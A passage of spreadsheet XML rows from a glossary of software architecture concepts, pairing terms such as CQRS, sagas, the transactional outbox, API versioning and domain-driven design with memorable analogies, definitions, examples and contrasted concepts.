        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" t="n">
        <v>0</v>
      </c>
      <c r="B677" t="inlineStr">
        <is>
          <t>675</t>
        </is>
      </c>
      <c r="C677" t="inlineStr">
        <is>
          <t>CQRS</t>
        </is>
      </c>
      <c r="D677" t="inlineStr">
        <is>
          <t>A restaurant with two doors: orders enter through the strict kitchen door (commands, checks), while diners browse the big glass buffet window (reads), pre-plated for speed.</t>
        </is>
      </c>
      <c r="E677" t="inlineStr">
        <is>
          <t>Splits the write model (commands, invariants) from read models (queries, projections) so each side scales and shapes data independently.</t>
        </is>
      </c>
      <c r="F677" t="inlineStr">
        <is>
          <t>POST -&gt; domain aggregate; GET -&gt; denormalized view table updated from events</t>
        </is>
      </c>
      <c r="G677" t="inlineStr">
        <is>
          <t>Event sourcing — often paired but independent; CQRS is two models, ES is log-as-truth. You can do CQRS over a plain SQL DB.</t>
        </is>
      </c>
      <c r="H677" t="inlineStr">
        <is>
          <t>Two-faced Janus — rejected, no read/write asymmetry in the image.</t>
        </is>
      </c>
      <c r="J677" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K677" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" t="n">
        <v>0</v>
      </c>
      <c r="B678" t="inlineStr">
        <is>
          <t>676</t>
        </is>
      </c>
      <c r="C678" t="inlineStr">
        <is>
          <t>Saga</t>
        </is>
      </c>
      <c r="D678" t="inlineStr">
        <is>
          <t>A trip booked in dominoes: flight, hotel, car click down in turn; when the car rental topples, gnomes sprint back up the line standing hotel and flight dominoes upright again (compensations).</t>
        </is>
      </c>
      <c r="E678" t="inlineStr">
        <is>
          <t>A long-running distributed transaction as a sequence of local transactions, each with a compensating action to undo on failure.</t>
        </is>
      </c>
      <c r="F678" t="inlineStr">
        <is>
          <t>ReserveFlight -&gt; ReserveHotel fails -&gt; run CancelFlight compensation</t>
        </is>
      </c>
      <c r="G678" t="inlineStr">
        <is>
          <t>Two-phase commit — 2PC locks all parties for atomicity; sagas accept intermediate states and undo with business-level compensations.</t>
        </is>
      </c>
      <c r="H678" t="inlineStr">
        <is>
          <t>Relay race passing a baton — rejected, no undo leg exists in relays.</t>
        </is>
      </c>
      <c r="J678" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K678" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" t="n">
        <v>0</v>
      </c>
      <c r="B679" t="inlineStr">
        <is>
          <t>677</t>
        </is>
      </c>
      <c r="C679" t="inlineStr">
        <is>
          <t>Idempotent consumer</t>
        </is>
      </c>
      <c r="D679" t="inlineStr">
        <is>
          <t>A stamp collector gluing envelopes by serial number into an album: the same envelope delivered twice gets a shrug — 'already glued in' — and hits the bin.</t>
        </is>
      </c>
      <c r="E679" t="inlineStr">
        <is>
          <t>Handlers detect and ignore duplicate deliveries — via message IDs or naturally idempotent writes — since brokers promise at-least-once.</t>
        </is>
      </c>
      <c r="F679" t="inlineStr">
        <is>
          <t>if processed_ids.contains(msg.id): skip; or UPSERT instead of INSERT</t>
        </is>
      </c>
      <c r="G679" t="inlineStr">
        <is>
          <t>Exactly-once delivery — a myth end-to-end; reality is at-least-once delivery plus idempotent processing to simulate it.</t>
        </is>
      </c>
      <c r="H679" t="inlineStr">
        <is>
          <t>Nightclub hand-stamp — rejected, stamps mark people, not messages.</t>
        </is>
      </c>
      <c r="J679" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K679" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" t="n">
        <v>0</v>
      </c>
      <c r="B680" t="inlineStr">
        <is>
          <t>678</t>
        </is>
      </c>
      <c r="C680" t="inlineStr">
        <is>
          <t>Eventual consistency</t>
        </is>
      </c>
      <c r="D680" t="inlineStr">
        <is>
          <t>Village gossip: grandma hears the wedding news a full day after the baker does, but by Sunday mass every single villager tells the identical story.</t>
        </is>
      </c>
      <c r="E680" t="inlineStr">
        <is>
          <t>Replicas may briefly disagree after a write; absent new updates all converge to the same state — reads can be stale meanwhile.</t>
        </is>
      </c>
      <c r="F680" t="inlineStr">
        <is>
          <t>DNS propagation; DynamoDB default reads; read-your-writes sessions as a remedy</t>
        </is>
      </c>
      <c r="G680" t="inlineStr">
        <is>
          <t>Strong consistency — strong makes every read see the latest write, paying latency and availability (CAP) for the privilege.</t>
        </is>
      </c>
      <c r="H680" t="inlineStr">
        <is>
          <t>Ripples settling in a pond — rejected, gossip shows per-replica lag.</t>
        </is>
      </c>
      <c r="J680" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K680" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" t="n">
        <v>0</v>
      </c>
      <c r="B681" t="inlineStr">
        <is>
          <t>679</t>
        </is>
      </c>
      <c r="C681" t="inlineStr">
        <is>
          <t>Transactional outbox</t>
        </is>
      </c>
      <c r="D681" t="inlineStr">
        <is>
          <t>The love letter is sealed into the same envelope as the rent check: one lick, one stamp — both arrive or neither does. The mailroom clerk (relay) does the actual posting.</t>
        </is>
      </c>
      <c r="E681" t="inlineStr">
        <is>
          <t>Write events to an outbox table in the SAME DB transaction as the state change; a relay publishes them later — no lost or phantom events.</t>
        </is>
      </c>
      <c r="F681" t="inlineStr">
        <is>
          <t>INSERT order; INSERT outbox(event); COMMIT; Debezium/poller ships rows to Kafka</t>
        </is>
      </c>
      <c r="G681" t="inlineStr">
        <is>
          <t>Dual write — the bug it fixes: writing DB then broker separately can succeed on one and silently fail on the other.</t>
        </is>
      </c>
      <c r="H681" t="inlineStr">
        <is>
          <t>Carbon-copy paper — rejected, envelope shows the atomic commit.</t>
        </is>
      </c>
      <c r="J681" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K681" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" t="n">
        <v>0</v>
      </c>
      <c r="B682" t="inlineStr">
        <is>
          <t>680</t>
        </is>
      </c>
      <c r="C682" t="inlineStr">
        <is>
          <t>Monolith vs microservices</t>
        </is>
      </c>
      <c r="D682" t="inlineStr">
        <is>
          <t>One granite boulder versus a mosaic of pebbles joined by strings: the boulder moves whole or not at all; pebbles travel alone, but the strings (network) fray and tangle.</t>
        </is>
      </c>
      <c r="E682" t="inlineStr">
        <is>
          <t>One deployable with in-process calls versus many independently deployable services with network calls — simplicity traded for autonomy plus ops cost.</t>
        </is>
      </c>
      <c r="F682" t="inlineStr">
        <is>
          <t>One Rails app on one box vs Netflix's hundreds of services</t>
        </is>
      </c>
      <c r="G682" t="inlineStr">
        <is>
          <t>Modular monolith — modules give boundaries WITHOUT the network; distribution is about deployment, not code structure.</t>
        </is>
      </c>
      <c r="H682" t="inlineStr">
        <is>
          <t>Cruise ship vs flotilla — kept as a backup image.</t>
        </is>
      </c>
      <c r="J682" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K682" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" t="n">
        <v>0</v>
      </c>
      <c r="B683" t="inlineStr">
        <is>
          <t>681</t>
        </is>
      </c>
      <c r="C683" t="inlineStr">
        <is>
          <t>Service boundary</t>
        </is>
      </c>
      <c r="D683" t="inlineStr">
        <is>
          <t>Cutting a birthday cake along the frosting roses, never through them: slice through a rose (capability) and both plates need each other's crumbs forever after.</t>
        </is>
      </c>
      <c r="E683" t="inlineStr">
        <is>
          <t>Draw service lines around business capabilities that change together, so one team can deploy without synchronizing with others.</t>
        </is>
      </c>
      <c r="F683" t="inlineStr">
        <is>
          <t>Billing, Shipping, Catalog services — not 'the controllers service'</t>
        </is>
      </c>
      <c r="G683" t="inlineStr">
        <is>
          <t>Bounded context — a great default source of boundaries; a service boundary adds deployment, team, and runtime autonomy on top.</t>
        </is>
      </c>
      <c r="H683" t="inlineStr">
        <is>
          <t>Property fence lines — rejected, cake-rose encodes 'don't cut through'.</t>
        </is>
      </c>
      <c r="J683" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K683" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" t="n">
        <v>0</v>
      </c>
      <c r="B684" t="inlineStr">
        <is>
          <t>682</t>
        </is>
      </c>
      <c r="C684" t="inlineStr">
        <is>
          <t>API versioning</t>
        </is>
      </c>
      <c r="D684" t="inlineStr">
        <is>
          <t>A highway keeps the rusty old bridge open while the new one rises alongside: signs read '/v1 left lane, /v2 right' — and nobody's car falls into the river.</t>
        </is>
      </c>
      <c r="E684" t="inlineStr">
        <is>
          <t>Publish breaking changes under a new explicit version while old versions keep serving, so clients migrate on their own schedule.</t>
        </is>
      </c>
      <c r="F684" t="inlineStr">
        <is>
          <t>GET /v2/users; Stripe-Version header; media-type versioning in Accept</t>
        </is>
      </c>
      <c r="G684" t="inlineStr">
        <is>
          <t>Backward-compatible change — additive changes (a new optional field) need NO new version; version only for breaks.</t>
        </is>
      </c>
      <c r="H684" t="inlineStr">
        <is>
          <t>Software v1/v2 boxes on a shelf — rejected, bridges show parallel serving.</t>
        </is>
      </c>
      <c r="J684" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K684" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" t="n">
        <v>0</v>
      </c>
      <c r="B685" t="inlineStr">
        <is>
          <t>683</t>
        </is>
      </c>
      <c r="C685" t="inlineStr">
        <is>
          <t>Backward compatibility</t>
        </is>
      </c>
      <c r="D685" t="inlineStr">
        <is>
          <t>Grandma's recipe card with extra sticky notes stapled on: old cooks simply ignore the staples and the cake still rises — but no one may ever cross out a line.</t>
        </is>
      </c>
      <c r="E685" t="inlineStr">
        <is>
          <t>Evolve APIs additively — add optional fields, never rename, remove, or retype — while clients ignore unknown fields (tolerant reader).</t>
        </is>
      </c>
      <c r="F685" t="inlineStr">
        <is>
          <t>Protobuf: never reuse field numbers; JSON consumers skip unknown keys</t>
        </is>
      </c>
      <c r="G685" t="inlineStr">
        <is>
          <t>Forward compatibility — backward: new server keeps old clients working; forward: old code tolerates NEW data it doesn't know.</t>
        </is>
      </c>
      <c r="H685" t="inlineStr">
        <is>
          <t>Old key fitting a new lock — rejected, staples show additive-only.</t>
        </is>
      </c>
      <c r="J685" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K685" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" t="n">
        <v>0</v>
      </c>
      <c r="B686" t="inlineStr">
        <is>
          <t>684</t>
        </is>
      </c>
      <c r="C686" t="inlineStr">
        <is>
          <t>Contract-first design</t>
        </is>
      </c>
      <c r="D686" t="inlineStr">
        <is>
          <t>Architects sign blueprints before one brick is laid: plumber and electrician build in parallel to the same drawing, and the inspector (contract test) checks walls against paper.</t>
        </is>
      </c>
      <c r="E686" t="inlineStr">
        <is>
          <t>Write and agree the API contract (OpenAPI, protobuf, AsyncAPI) before implementing; both sides generate code and test against it.</t>
        </is>
      </c>
      <c r="F686" t="inlineStr">
        <is>
          <t>openapi.yaml -&gt; generate server stubs + client SDK; Pact contract tests in CI</t>
        </is>
      </c>
      <c r="G686" t="inlineStr">
        <is>
          <t>Code-first with generated docs — docs derived from code drift with it; contract-first makes the spec the source of truth.</t>
        </is>
      </c>
      <c r="H686" t="inlineStr">
        <is>
          <t>Prenup agreement — rejected, blueprints add the parallel-build payoff.</t>
        </is>
      </c>
      <c r="J686" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K686" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" t="n">
        <v>0</v>
      </c>
      <c r="B687" t="inlineStr">
        <is>
          <t>685</t>
        </is>
      </c>
      <c r="C687" t="inlineStr">
        <is>
          <t>Backend for frontend (BFF)</t>
        </is>
      </c>
      <c r="D687" t="inlineStr">
        <is>
          <t>Personal shoppers per customer: the mobile shopper packs a tiny pre-chewed lunchbox, the web shopper loads a full banquet cart — both raid the same warehouses.</t>
        </is>
      </c>
      <c r="E687" t="inlineStr">
        <is>
          <t>A dedicated backend per client type (web, mobile, TV) that aggregates and reshapes downstream APIs to that UI's exact needs.</t>
        </is>
      </c>
      <c r="F687" t="inlineStr">
        <is>
          <t>Netflix: separate API edge services for iOS vs TV clients</t>
        </is>
      </c>
      <c r="G687" t="inlineStr">
        <is>
          <t>API gateway — a gateway is one generic front door (auth, routing); a BFF is client-specific and owned by that client's team.</t>
        </is>
      </c>
      <c r="H687" t="inlineStr">
        <is>
          <t>Custom-tailored suits — rejected, shoppers show the aggregation step.</t>
        </is>
      </c>
      <c r="J687" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K687" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" t="n">
        <v>0</v>
      </c>
      <c r="B688" t="inlineStr">
        <is>
          <t>686</t>
        </is>
      </c>
      <c r="C688" t="inlineStr">
        <is>
          <t>Strangler fig</t>
        </is>
      </c>
      <c r="D688" t="inlineStr">
        <is>
          <t>A strangler fig vine wrapping a great old oak: root by root it steals the light, and years later the vine IS the tree — hollow bark where the oak once stood.</t>
        </is>
      </c>
      <c r="E688" t="inlineStr">
        <is>
          <t>Incrementally replace a legacy system by routing slices of traffic to new services growing around it, until the old core can be deleted.</t>
        </is>
      </c>
      <c r="F688" t="inlineStr">
        <is>
          <t>Proxy routes /invoices to the new service, everything else to legacy; migrate route by route</t>
        </is>
      </c>
      <c r="G688" t="inlineStr">
        <is>
          <t>Big-bang rewrite — the fig migrates in shippable slices with rollback; a rewrite bets everything on one cut-over day.</t>
        </is>
      </c>
      <c r="H688" t="inlineStr">
        <is>
          <t>Ship of Theseus — rejected, the fig is the pattern's actual name.</t>
        </is>
      </c>
      <c r="J688" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K688" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" t="n">
        <v>0</v>
      </c>
      <c r="B689" t="inlineStr">
        <is>
          <t>687</t>
        </is>
      </c>
      <c r="C689" t="inlineStr">
        <is>
          <t>Distributed monolith</t>
        </is>
      </c>
      <c r="D689" t="inlineStr">
        <is>
          <t>Chain-gang prisoners in separate cells: officially independent, yet shackled ankle-to-ankle straight through the walls — one man shifting drags every cell block.</t>
        </is>
      </c>
      <c r="E689" t="inlineStr">
        <is>
          <t>Services that must be deployed, versioned, or changed together — network overhead plus tight coupling; the worst of both worlds.</t>
        </is>
      </c>
      <c r="F689" t="inlineStr">
        <is>
          <t>Smells: shared database across services, lockstep releases, sync call chains 5 deep</t>
        </is>
      </c>
      <c r="G689" t="inlineStr">
        <is>
          <t>Honest monolith — a monolith is coupling in-process, cheaply; the smell is PAYING distribution costs without gaining autonomy.</t>
        </is>
      </c>
      <c r="H689" t="inlineStr">
        <is>
          <t>Synchronized swimmers in separate pools — kept as a comic backup.</t>
        </is>
      </c>
      <c r="J689" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K689" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" t="n">
        <v>0</v>
      </c>
      <c r="B690" t="inlineStr">
        <is>
          <t>688</t>
        </is>
      </c>
      <c r="C690" t="inlineStr">
        <is>
          <t>API gateway</t>
        </is>
      </c>
      <c r="D690" t="inlineStr">
        <is>
          <t>A castle gatehouse: one drawbridge where guards check papers, count entrants, and point carts to the right courtyard — the inner keeps have no doors to the outside world.</t>
        </is>
      </c>
      <c r="E690" t="inlineStr">
        <is>
          <t>A single entry point in front of services handling cross-cutting edge concerns — routing, auth, rate limiting, TLS — so each service doesn't.</t>
        </is>
      </c>
      <c r="F690" t="inlineStr">
        <is>
          <t>Kong/Envoy/AWS API Gateway: /users -&gt; user-svc after JWT check and rate limit</t>
        </is>
      </c>
      <c r="G690" t="inlineStr">
        <is>
          <t>BFF — a gateway is one shared generic edge; a BFF is per-client and reshapes payloads for that specific UI.</t>
        </is>
      </c>
      <c r="H690" t="inlineStr">
        <is>
          <t>Airport security funnel — rejected, gatehouse pairs with castle walls at 650.</t>
        </is>
      </c>
      <c r="J690" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K690" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" t="n">
        <v>0</v>
      </c>
      <c r="B691" t="inlineStr">
        <is>
          <t>689</t>
        </is>
      </c>
      <c r="C691" t="inlineStr">
        <is>
          <t>Modular monolith</t>
        </is>
      </c>
      <c r="D691" t="inlineStr">
        <is>
          <t>An apartment building with individually locked units and one street address: tenants (modules) cannot wander into each other's kitchens, yet there is exactly one front door to maintain.</t>
        </is>
      </c>
      <c r="E691" t="inlineStr">
        <is>
          <t>One deployable whose internal modules keep strict boundaries and own their data — microservice discipline without the network.</t>
        </is>
      </c>
      <c r="F691" t="inlineStr">
        <is>
          <t>Shopify's Rails core with packwerk-enforced component boundaries</t>
        </is>
      </c>
      <c r="G691" t="inlineStr">
        <is>
          <t>Big ball of mud — the difference is ENFORCED module boundaries; mud has one deployable AND no interior walls.</t>
        </is>
      </c>
      <c r="H691" t="inlineStr">
        <is>
          <t>Bento box — rejected, compartments suggest food not enforced locks.</t>
        </is>
      </c>
      <c r="J691" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K691" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" t="n">
        <v>0</v>
      </c>
      <c r="B692" t="inlineStr">
        <is>
          <t>690</t>
        </is>
      </c>
      <c r="C692" t="inlineStr">
        <is>
          <t>Ubiquitous language</t>
        </is>
      </c>
      <c r="D692" t="inlineStr">
        <is>
          <t>A ship's crew who call every rope by its exact name: shout 'halyard!' and all hands grab the same line. Mutter 'that ropey thing' and the mast comes down.</t>
        </is>
      </c>
      <c r="E692" t="inlineStr">
        <is>
          <t>One precise shared vocabulary, spoken by developers and domain experts alike, used identically in conversation, models, and code.</t>
        </is>
      </c>
      <c r="F692" t="inlineStr">
        <is>
          <t>Experts say 'the policy lapses' -&gt; class Policy { lapse() } — never 'deactivate'</t>
        </is>
      </c>
      <c r="G692" t="inlineStr">
        <is>
          <t>Company jargon — jargon drifts per department; ubiquitous language is deliberately unified WITHIN one bounded context.</t>
        </is>
      </c>
      <c r="H692" t="inlineStr">
        <is>
          <t>Babel tower falling — rejected, encodes failure, not the discipline.</t>
        </is>
      </c>
      <c r="J692" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K692" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" t="n">
        <v>0</v>
      </c>
      <c r="B693" t="inlineStr">
        <is>
          <t>691</t>
        </is>
      </c>
      <c r="C693" t="inlineStr">
        <is>
          <t>Entity</t>
        </is>
      </c>
      <c r="D693" t="inlineStr">
        <is>
          <t>A man with a barcode tattooed on his ankle: he ages, dyes his hair, changes his name twice — the scanner still beeps the same ID. He IS his barcode.</t>
        </is>
      </c>
      <c r="E693" t="inlineStr">
        <is>
          <t>A domain object defined by a stable identity that persists through time, not by its attributes, which may all change.</t>
        </is>
      </c>
      <c r="F693" t="inlineStr">
        <is>
          <t>Customer #881 changes address and email — still the same Customer</t>
        </is>
      </c>
      <c r="G693" t="inlineStr">
        <is>
          <t>Value object — swap every field of an entity and it is still 'it'; a value object with different fields IS a different value.</t>
        </is>
      </c>
      <c r="H693" t="inlineStr">
        <is>
          <t>Passport holder — rejected, passports expire and get reissued.</t>
        </is>
      </c>
      <c r="J693" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K693" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" t="n">
        <v>0</v>
      </c>
      <c r="B694" t="inlineStr">
        <is>
          <t>692</t>
        </is>
      </c>
      <c r="C694" t="inlineStr">
        <is>
          <t>Value object</t>
        </is>
      </c>
      <c r="D694" t="inlineStr">
        <is>
          <t>Two identical 2x4 red LEGO bricks: shuffle them behind your back and nobody can ever tell. To 'change' one's color you don't repaint — you pick up a different brick.</t>
        </is>
      </c>
      <c r="E694" t="inlineStr">
        <is>
          <t>An immutable object defined entirely by its attribute values, with no identity; equal fields mean interchangeable objects.</t>
        </is>
      </c>
      <c r="F694" t="inlineStr">
        <is>
          <t>Money(10,'EUR') == Money(10,'EUR'); LocalDate; Coordinates(lat, lng)</t>
        </is>
      </c>
      <c r="G694" t="inlineStr">
        <is>
          <t>Entity — entities compare by ID and may mutate; value objects compare by all fields and should be immutable.</t>
        </is>
      </c>
      <c r="H694" t="inlineStr">
        <is>
          <t>Two ten-euro notes — rejected: real banknotes carry serial numbers (identity).</t>
        </is>
      </c>
      <c r="J694" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K694" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" t="n">
        <v>0</v>
      </c>
      <c r="B695" t="inlineStr">
        <is>
          <t>693</t>
        </is>
      </c>
      <c r="C695" t="inlineStr">
        <is>
          <t>Aggregate &amp; root</t>
        </is>
      </c>
      <c r="D695" t="inlineStr">
        <is>
          <t>A grape bunch held only by its stem: to move, sell, or inspect any grape you must lift the stem (root). Pluck a grape directly and invariant juice spills everywhere.</t>
        </is>
      </c>
      <c r="E695" t="inlineStr">
        <is>
          <t>A cluster of entities and values with one root as sole entry point; the root enforces invariants and is saved as one transactional unit.</t>
        </is>
      </c>
      <c r="F695" t="inlineStr">
        <is>
          <t>Order (root) owns OrderLines; order.addLine() enforces the total; repo saves the Order whole</t>
        </is>
      </c>
      <c r="G695" t="inlineStr">
        <is>
          <t>Plain object graph — an aggregate forbids outside references to its internals; only the root's ID crosses the boundary.</t>
        </is>
      </c>
      <c r="H695" t="inlineStr">
        <is>
          <t>Keyring — rejected, keys hang independently with no invariants.</t>
        </is>
      </c>
      <c r="J695" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K695" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" t="n">
        <v>0</v>
      </c>
      <c r="B696" t="inlineStr">
        <is>
          <t>694</t>
        </is>
      </c>
      <c r="C696" t="inlineStr">
        <is>
          <t>Repository</t>
        </is>
      </c>
      <c r="D696" t="inlineStr">
        <is>
          <t>A magic library counter: whisper 'Order 42' and the librarian slides you the whole bound volume; hand one back and it is filed. You never see the stacks (SQL).</t>
        </is>
      </c>
      <c r="E696" t="inlineStr">
        <is>
          <t>A collection-like abstraction for retrieving and persisting whole aggregates, keeping domain code free of query and storage detail.</t>
        </is>
      </c>
      <c r="F696" t="inlineStr">
        <is>
          <t>orders.findById(id); orders.save(order) — interface in domain, impl in infrastructure</t>
        </is>
      </c>
      <c r="G696" t="inlineStr">
        <is>
          <t>DAO — a DAO mirrors tables and rows; a repository speaks in whole aggregates and domain terms, one per aggregate root.</t>
        </is>
      </c>
      <c r="H696" t="inlineStr">
        <is>
          <t>Coat-check booth — rejected, coats come back unchanged; aggregates evolve.</t>
        </is>
      </c>
      <c r="J696" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K696" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" t="n">
        <v>0</v>
      </c>
      <c r="B697" t="inlineStr">
        <is>
          <t>695</t>
        </is>
      </c>
      <c r="C697" t="inlineStr">
        <is>
          <t>Bounded context</t>
        </is>
      </c>
      <c r="D697" t="inlineStr">
        <is>
          <t>Two embassies on one street: inside each fence 'visa' means something precise — and different. Cross a gate and your papers must be re-translated.</t>
        </is>
      </c>
      <c r="E697" t="inlineStr">
        <is>
          <t>An explicit boundary inside which one model and language hold consistently; the same word may map to a different model next door.</t>
        </is>
      </c>
      <c r="F697" t="inlineStr">
        <is>
          <t>'Product' in Catalog (photos, copy) vs in Shipping (weight, dimensions)</t>
        </is>
      </c>
      <c r="G697" t="inlineStr">
        <is>
          <t>Microservice — contexts are model and language boundaries; a service is a deployment unit. Often 1:1, but not necessarily.</t>
        </is>
      </c>
      <c r="H697" t="inlineStr">
        <is>
          <t>Country dialects — rejected, dialects blur at borders; contexts are sharp.</t>
        </is>
      </c>
      <c r="J697" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K697" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" t="n">
        <v>0</v>
      </c>
      <c r="B698" t="inlineStr">
        <is>
          <t>696</t>
        </is>
      </c>
      <c r="C698" t="inlineStr">
        <is>
          <t>Context mapping</t>
        </is>
      </c>
      <c r="D698" t="inlineStr">
        <is>
          <t>A war-room map with strings between embassy pins, each string labeled 'who obeys whom': some pairs share a treaty (shared kernel), others hide behind translators (ACL).</t>
        </is>
      </c>
      <c r="E698" t="inlineStr">
        <is>
          <t>Documenting relationships between bounded contexts — partnership, customer/supplier, conformist, ACL, shared kernel — and who adapts to whom.</t>
        </is>
      </c>
      <c r="F698" t="inlineStr">
        <is>
          <t>Sales conforms to the legacy ERP's model; Payments shields itself via an ACL</t>
        </is>
      </c>
      <c r="G698" t="inlineStr">
        <is>
          <t>Architecture diagram — boxes-and-arrows show calls; a context map shows POWER and model-translation relationships.</t>
        </is>
      </c>
      <c r="H698" t="inlineStr">
        <is>
          <t>Family tree of in-laws — rejected, no direction of obedience.</t>
        </is>
      </c>
      <c r="J698" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K698" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" t="n">
        <v>0</v>
      </c>
      <c r="B699" t="inlineStr">
        <is>
          <t>697</t>
        </is>
      </c>
      <c r="C699" t="inlineStr">
        <is>
          <t>Domain event</t>
        </is>
      </c>
      <c r="D699" t="inlineStr">
        <is>
          <t>A town crier's scroll nailed to the market post: 'OrderShipped, this third of June!' — past tense, sealed in wax; anyone may read and react, no one may edit.</t>
        </is>
      </c>
      <c r="E699" t="inlineStr">
        <is>
          <t>An immutable record, named in past tense in the ubiquitous language, of something meaningful that happened in the domain.</t>
        </is>
      </c>
      <c r="F699" t="inlineStr">
        <is>
          <t>class OrderShipped { orderId, occurredAt }; published after the commit</t>
        </is>
      </c>
      <c r="G699" t="inlineStr">
        <is>
          <t>Command — a command asks for something TO happen (imperative, refusable); an event states it already DID (immutable fact).</t>
        </is>
      </c>
      <c r="H699" t="inlineStr">
        <is>
          <t>Birth certificate — rejected, certificates get amended; events never.</t>
        </is>
      </c>
      <c r="J699" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K699" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" t="n">
        <v>0</v>
      </c>
      <c r="B700" t="inlineStr">
        <is>
          <t>698</t>
        </is>
      </c>
      <c r="C700" t="inlineStr">
        <is>
          <t>Domain service</t>
        </is>
      </c>
      <c r="D700" t="inlineStr">
        <is>
          <t>A freelance notary who owns no house: he walks between households (aggregates) to officiate exchanges no single family could sign alone, then leaves carrying nothing.</t>
        </is>
      </c>
      <c r="E700" t="inlineStr">
        <is>
          <t>A stateless domain operation that spans multiple aggregates or fits no single entity, expressed in the ubiquitous language.</t>
        </is>
      </c>
      <c r="F700" t="inlineStr">
        <is>
          <t>TransferService.transfer(fromAccount, toAccount, amount) — touches two aggregates</t>
        </is>
      </c>
      <c r="G700" t="inlineStr">
        <is>
          <t>Application service — app services orchestrate use cases (transactions, auth, DTOs); domain services hold BUSINESS rules spanning entities.</t>
        </is>
      </c>
      <c r="H700" t="inlineStr">
        <is>
          <t>Traveling referee — rejected, referees judge, notaries execute the deal.</t>
        </is>
      </c>
      <c r="J700" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K700" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" t="n">
        <v>0</v>
      </c>
      <c r="B701" t="inlineStr">
        <is>
          <t>699</t>
        </is>
      </c>
      <c r="C701" t="inlineStr">
        <is>
          <t>Anemic domain model</t>
        </is>
      </c>
      <c r="D701" t="inlineStr">
        <is>
